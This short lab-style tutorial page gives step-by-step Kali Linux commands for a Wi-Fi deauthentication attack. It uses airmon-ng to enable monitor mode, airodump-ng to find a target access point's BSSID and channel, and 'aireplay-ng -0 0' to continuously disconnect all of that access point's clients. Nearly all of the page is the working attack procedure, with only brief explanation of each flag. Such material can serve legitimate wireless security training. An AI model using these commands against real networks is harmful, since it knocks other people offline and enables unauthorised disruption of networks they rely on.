top of page

Blocking Wifi Access Point

Deliverable:


Lab Set up

Attacker’s System: Kali Linux

Target : Access Point or Router with Open / WEP / WPA / WPA2 security


In Kali Linux --> Terminal



1. To put wlan0 on monitor mode

~# airmon-ng start wlan0


Here, wlan0 --> wireless interface



2. To check available access points

~# airodump-ng mon0


Here, mon0 --> interface for monitor mode


Note down BSSID, Channel number, etc of the target.



3. To block the wifi access point

~# aireplay-ng -0 0 -a [MAC address of access point] mon0


Here, -0 --> deauthenticate attack vector

0 --> count for deauthenticate attack vector (0 means deauthenticated continuously)

-a --> BSSID of router (MAC address)

mon0 --> interface for monitor mode



If above command gives some error then


~# airodump-ng mon0 -c [channel number used by access point]


~# aireplay-ng -0 0 -a [MAC address of access point] mon0



4. You will see that all the clients connected to the target access point are disconnected and will be deauthenticated continuously.



5. To stop this and allow clients to connect with access point

--> Press ctrl + c



bottom of page